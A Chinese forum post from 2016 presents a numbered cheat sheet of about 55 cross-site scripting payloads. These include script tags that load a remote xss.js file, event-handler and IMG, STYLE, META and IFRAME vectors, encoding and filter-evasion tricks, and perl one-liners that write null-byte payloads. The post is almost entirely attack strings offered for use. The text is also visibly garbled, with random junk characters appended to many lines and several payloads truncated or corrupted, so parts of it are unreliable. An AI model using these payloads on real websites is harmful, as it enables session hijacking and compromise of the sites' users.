找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2479|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入( V4 n9 D/ g; I9 \$ r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 Z, \( j& y  v2 ?) Z1 u9 h/ b
(99)另类弹框
  f, L- g! q# k; w
<q/oncut=alert()>1
9 L$ c4 k' c4 g. O/ n<s/onclick=alert()>b! y5 L& D( u! I$ P# K  u
<XSS=" onclick="alert(1)//">clickme</SSX=">9 f  b! @; u. X" x& _5 s
<zzz onclick=alert`1`>clickme</zzz>
6 _% V+ B: r7 G) i; V' ^ <a onclick=alert`1`>clickme</a>
( g+ ^' j) W5 [" n, P/ @+ w' z<a=">clickme</a=">
6 \. \0 c7 y( G% i<a=">clickme</a>
' y6 t: U8 Y( X) W' x" D<z=">clickme</z=">! E7 C5 @5 g9 B; E9 C$ m4 M
<z onclick=alert`1`>clickme</z>
& j" u# h2 j8 b% K2 N/ T9 m; S
) {4 {: t3 W* E4 l  E(2)IMG标签XSS使用JavaScript命令
, G: M' ?% v; ?8 H3 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 {5 y3 v- Y  |$ H0 q

( r8 E( P' G  E' T: {3 j; c
(3)IMG标签无分号无引号5 E, n. c4 b; C; Q, K0 U
<IMG SRC=javascript:alert(‘XSS’)>8 R, F  c. `+ P0 C: b% P5 h
1 L: A+ ^( o( T: ~4 O- x8 k
(4)IMG标签大小写不敏感
9 b3 R1 U% i; B' ^/ c1 y+ ?( E2 i3 h
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 ]8 J4 Y4 E8 ]  K
8 H- c  E7 b5 Q% P
(5)HTML编码(必须有分号)* a& n+ B* D# Q; ?- ^  i" C
<IMG SRC=javascript:alert(“XSS”)>
( @9 ?3 R$ ^; o/ {- H. U9 }2 O8 `' x- `8 g! B
) Y6 Z" M* Y# c' G4 X3 t6 }
(6)修正缺陷IMG标签
: a5 b* k  q6 T( q
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* O4 f& S5 S' ~' `

! X' h; @7 Z% g0 ^5 O, Q; D% }
(7)formCharCode标签(计算器)
  V$ k; v  v  a0 k
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
" I& s" C6 w6 |) J
4 M  S- L4 u$ c8 b  a1 U& T' ]; n
(8)UTF-8的Unicode编码(计算器)
- }$ |- r1 T$ P
<IMG SRC=jav..省略..S')>
* O" k9 @2 l3 N4 u5 T

# c( X/ Z$ s8 ~: U2 L  V
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 o& s- Q- ~7 U4 F7 g
<IMG SRC=jav..省略..S')>
, J4 J; d2 b- f- z) i; g& G) V

+ K: q+ Q9 ]; z, `# F$ y* g4 o) i
(10)十六进制编码也是没有分号(计算器)
/ F+ D; `9 B, w
<IMG SRC=\'#\'" /span>. z1 V- v) ?% g% W  Q
3 X% v/ v5 Z& ~
(11)嵌入式标签,将Javascript分开, S2 ~& K' F  W3 U0 m# ?
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 I( J  D  l( w6 e6 Z& f+ M) P0 B4 o* U/ Z. ]) \
(12)嵌入式编码标签,将Javascript分开) N  u4 y5 L& `( X0 G; I
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>) \5 {, G8 `; \* N' ^- [

1 }2 f9 N* I$ w# k0 |(13)嵌入式换行符
- b3 T# k# j! t0 s. \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 }% V- h: d9 Q) _9 |8 F4 N- \" C' |+ X# F* ~
(14)嵌入式回车
. F  t0 m  K! O, u" @7 E- Q, _<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" J, c+ _# R' Z( b- I9 Z( J' {3 e
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 S6 j/ G8 z7 `) p5 [* n9 ?% Z
<IMG SRC=\'#\'" /span>4 n- N& A6 S' H$ S9 V6 g5 V% b) o" e
  B, b& S+ |, ~2 S! ~
(16)解决限制字符(要求同页面)
1 A  F5 P. n+ [; B2 L) J<script>z=’document.’</script>
7 H5 V) @- j% k, i' t<script>z=z+’write(“‘</script>
8 i  \; z* i5 C( u8 ~<script>z=z+’<script’</script>
- a) o6 r! s" m+ Q8 H& O0 u<script>z=z+’ src=ht’</script># }( G" h, r+ i
<script>z=z+’tp://ww’</script>' A. z: G: z# O/ @4 \# j- ~
<script>z=z+’w.shell’</script>
% `  |$ L8 j3 A' F5 x) u8 C9 k4 U<script>z=z+’.net/1.’</script>  @2 I8 N- N, Q" |
<script>z=z+’js></sc’</script>
7 }0 B# M9 T3 }; v; R<script>z=z+’ript>”)’</script>
- C1 i& D( P& Q+ W) {9 e<script>eval_r(z)</script>
( J4 A3 M& p) A' A( |* C+ k+ a' F
$ c: K* h. n6 F6 E(17)空字符( k6 t/ T" q; X5 X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) s) M- R$ n, a0 ~4 K. R0 T/ k

' ?' A7 e/ S$ k/ j8 Y* {+ @/ x(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用& H: b9 h+ Q0 T1 \
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ E5 L2 V# ^# G  h# U3 A8 n  Z, y' y
(19)Spaces和meta前的IMG标签, j( p! e$ X; ~3 I0 l2 o  ?
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>9 i9 c- n7 l  Z

& |  [  h: u2 [# F# O9 m(20)Non-alpha-non-digit XSS
' X4 W7 I( u; f0 I: G<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
/ i9 F& S& V: u" |  P" @- n1 @1 S
( n' |  H7 Y  }% o% z+ y: q(21)Non-alpha-non-digit XSS to 2
7 d3 \- \1 a; b6 q# J<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 O0 D9 |7 z' g# K' Z5 D

3 q9 w1 w% c1 x+ X# @- i# a2 F9 }) h9 X(22)Non-alpha-non-digit XSS to 3
) ^1 w( y% F# E, f" I; Z<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
# g; R! U2 [" \3 ~$ F! \. @2 Z. k$ Z
6 x6 \" w- s: Y) d(23)双开括号' o- i; L! i4 \; O; w6 J4 Q9 @( F
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ A- I- u* F5 d1 f5 q$ L0 v. {; K! @
(24)无结束脚本标记(仅火狐等浏览器)
+ v7 S, h1 I' K+ a8 O# e/ ~<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' L7 q" L, a7 h

* S! ^" ], A& z# `3 [0 c(25)无结束脚本标记20 v/ w( r2 T7 A% p9 ~: [
<SCRIPT SRC=//3w.org/XSS/xss.js>2 k  `; n3 D3 N: N' x$ V

6 D( \2 @) n6 o+ m3 m" |( N' f1 c(26)半开的HTML/JavaScript XSS
! W/ N6 l) J$ y4 R' L<IMG SRC=\'#\'" /span>6 Q2 L. R- K5 l% J5 ]
( U# P8 Y4 V9 v' I- ~; Z& z$ C
(27)双开角括号
% P* n1 a2 l( v<iframe src=http://3w.org/XSS.html <; Z) F/ _% E$ j" q8 }% k
0 Z; O! R9 d1 ]. y( S, I
(28)无单引号 双引号 分号
1 ^  @7 Z6 T! U<SCRIPT>a=/XSS/6 q$ R' T/ w. R9 T9 z' w) U
alert(a.source)</SCRIPT>: \5 h1 ?6 ^9 r/ X

/ L1 v6 P/ I4 \2 f5 {0 h) i& G(29)换码过滤的JavaScript
/ |; ~! @; h+ }3 S: [8 \) [\”;alert(‘XSS’);//( B# x0 ]8 \% N$ T4 G
  _( |* M$ F9 F8 J7 j9 {$ U
(30)结束Title标签  K4 Y, V$ A6 L2 J
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' `0 W1 w& l( U8 J
3 K1 ?3 ?( s+ \  R8 y$ o6 I
(31)Input Image: Q6 ?; m# b! C8 R1 J! o
<INPUT SRC=\'#\'" /span>
- H7 q+ q! [! ]0 m9 R9 K
6 s" O5 F5 ^/ p( _; H0 W7 {7 b3 I(32)BODY Image; f  w: u! M0 S" y- [
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>  M: I9 n+ d$ g. s3 A

* G7 |. b) [* F4 ]6 u" A(33)BODY标签
6 p9 G: w2 J4 g! I1 Z<BODY(‘XSS’)>& R: ^/ p: w' E' `8 A* j% G% ]  K

) V" n$ M( E3 b+ l& h(34)IMG Dynsrc6 X2 ^, I7 {7 o
<IMG DYNSRC=\'#\'" /span>
2 [7 T% ^4 h8 y$ \2 y5 {
: j. X& S. V7 W6 k: w/ J(35)IMG Lowsrc1 j: ~% q% h1 l2 y" v7 ~
<IMG LOWSRC=\'#\'" /span>6 l4 x/ N9 t- Q8 {. D+ `3 N

9 L. \- \2 Z0 ]# C3 u(36)BGSOUND, G" M* S, b( I  x* e$ l6 d1 a
<BGSOUND SRC=\'#\'" /span>
$ z) N9 z  Z) N2 T  ^" b: e9 m; e* i3 x; r1 p$ I" c' t* {
(37)STYLE sheet
' Q4 M; h1 i0 z4 x! p% h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- L6 N, D2 a6 B+ Q9 X7 d- x& o
* l6 w6 A  O  h! ?9 `% ?3 m
(38)远程样式表
" B7 l% ]! `+ p- w/ ]" N$ c<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* T  m" H( f' L% b9 z# C' Y
/ ~' g' ?* }; n# i0 Q, D" @
(39)List-style-image(列表式)
2 L5 ~! c: g. ~: c3 `<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- ]7 L) E$ K  c" @4 R& s) [; S- S7 P2 @' S
(40)IMG VBscript9 P" ?, H) ?4 Z
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS4 A: }4 f* g5 D8 B+ ]! c) M
. E- p6 X2 H  k4 ?+ x3 z* S
(41)META链接url) F- M5 n1 }' j/ u
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>6 @5 k) e! a  w& Q" m

, I9 Y2 l& p: T9 m% m# J(42)Iframe
+ V/ W+ O# g) _4 _8 c) a<IFRAME SRC=\'#\'" /IFRAME># g' B* a$ {* e# S( ]

% A8 g1 K  c+ k( q6 z7 X. {. l0 ]& J(43)Frame( b; M" p8 U0 d
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>8 [  Z! F' b. K% X2 z

8 x! m8 k7 Y1 j+ X(44)Table
7 h5 b- h8 C; ^( ~, m6 f: y) X<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
; y; C  m; S3 N) ^/ Y" [
3 ~% c- Y: b! b5 ?; K(45)TD
- ~8 A5 V7 s) H% \2 y<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, w* s: p6 i) c
! J8 A: U) Y2 R, {' U* |2 J
(46)DIV background-image- h5 T9 w. h3 @
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! d6 F( X1 c  S6 T8 @  U
6 J! Q' G1 ^7 t5 F" n, G( C4 V(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: s! N- w! l$ h' a# g<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" n: ~) s9 o/ n) b. ~$ b0 V. E
$ ?5 g' w; n$ p7 ?. b1 m( ?
(48)DIV expression" o+ Y, @3 l$ X# x* Q( e
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>7 m# j0 z+ w2 ?; O' Y- V9 o4 |
4 y' [2 b' A$ G/ m( J5 h3 L
(49)STYLE属性分拆表达
/ v# v* i0 ?$ j/ _: ?<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
  Z$ E# K- [, _: D6 D
1 d3 O0 P0 B# _) y+ U% h(50)匿名STYLE(组成:开角号和一个字母开头)  [, {3 E0 @" ^7 B
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 w8 w- \* a) b$ a  O. S8 a6 x3 L. n5 \% ~: t5 g" A9 T
(51)STYLE background-image
" M! M3 W/ \7 F9 v; L<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ F, n5 `8 E! Y
2 C' u  J3 n: {. s; |
(52)IMG STYLE方式
6 z) [% i$ |: v) d6 C6 n& Dexppression(alert(“XSS”))’>3 R! K  F- `8 j1 z$ C
, \1 c6 I) s0 G* i: \
(53)STYLE background
3 v; v0 x5 b! {) i; T) ^<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& e* p5 a$ d) Z/ t5 x: |
) I  V: E- y% c9 j5 q5 a(54)BASE
) ]% X5 N- C- J<BASE HREF=”javascript:alert(‘XSS’);//”>9 h* x; C/ q4 T& \3 z7 q# G
3 t4 `7 J3 K' E
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 m* z/ g: r( D8 b9 _. S
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

8 r! `6 }6 L: Q% S, x" z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表